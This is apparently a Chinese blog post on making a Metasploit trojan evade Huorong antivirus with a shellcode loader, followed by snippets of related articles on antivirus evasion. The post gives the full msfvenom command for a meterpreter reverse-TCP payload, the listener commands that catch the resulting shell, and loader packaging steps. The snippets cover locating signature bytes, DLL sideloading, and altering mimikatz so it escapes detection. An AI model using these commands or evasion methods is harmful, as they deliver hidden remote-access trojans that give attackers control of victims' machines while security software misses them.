Shellcodeloader免杀过火绒

一颗小胡椒2022-03-28 22:38:49

题记

    今天脑子里面蹦出来个想法,免杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究免杀火绒吧。

环境

    Kali:192.168.0.119 win10:192.168.0.200

     工具地址:https://github.com/knownsec/shellcodeloader

步骤

1、在kali生成3.bin木马。

     msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin

2、把木马移到工具上做免杀。

生成loder.exe软件,可随意改名,运行就能上线。

3、kali开启监听。

     msfconsole

     use exploit/multi/handler

     set payload windows/x64/meterpreter/reverse_tcp

     set lhost 192.168.0.119

     exploit

     然后运行exe

     上线

4、火绒检测

     软件运行后检测。

免杀
本作品采用《CC 协议》,转载必须注明作者和本文链接
0X01起源在攻防演练中通过运行恶意代码连接C2是最常用的手段,但是由于对抗程度的提升。以360、天擎为代表的毒软件针对信任链的检测,已经变得愈来愈成熟。这里我们可以理解为,攻击者通过利用"白加黑"这种攻击方法。当攻击者通过社工钓鱼的手段,使得目标下载恶意的文件到目标自己的计算机上,并点击运行白文件时,该文件会在运行时执行恶意DLL。
Bypass_AV msf,ShellCode加载器 ,shellcode执行程序 ,360&火绒&Windows Defender代码够简单,估计要不了多久就进特征库了,被了再去改几个特征码照样又可以,作者的github保持更新,可以去瞅瞅。测试可以国内软?注意:ShellCode 需要是64位的加载器将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处注意:保留原始ShellCode 里的双引号 "示例:最终格式:打包成可执行程序编译Python 3.8.6pyinstaller 4.7pip install pyinstaller
Bypass_AV msf,ShellCode加载器 ,shellcode执行程序 ,360&火绒&Windows Defender。代码够简单,估计要不了多久就进特征库了,被了再去改几个特征码照样又可以,保持更新。
技术有一套
2022-07-20 09:45:45
方式可能是上面的两种方式,看情况。动态行为,运行中执行的某些行为被毒软件拦截报读。不同工具之前局别是使用的分割算法不同,查找特征码的效果不同。
,又叫毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次就能完成了。
方式可能是上面的两种方式,看情况。动态行为,运行中执行的某些行为被毒软件拦截报读。不同工具之前局别是使用的分割算法不同,查找特征码的效果不同。然后继续测试另外的连锁条件,直到找到最后一个连锁条件,抹掉后,整个文件了,则说明特征代码被定为完毕了,所以VIRTEST绝对可以精确的定位出所有的复合特征。直到定位到某个函数或者多个函数,进入3。有,单独检查该文件或者数据,方法从1开始。
入门之静态
2022-04-30 06:53:30
该工具已经被市面上软加入病毒特征库,我们的目标就是修改该程序特征码并且不能影响其正常使用。最后测试mimikatz功能也是正常的,至此完成。
一篇静态的文章
一颗小胡椒
暂无描述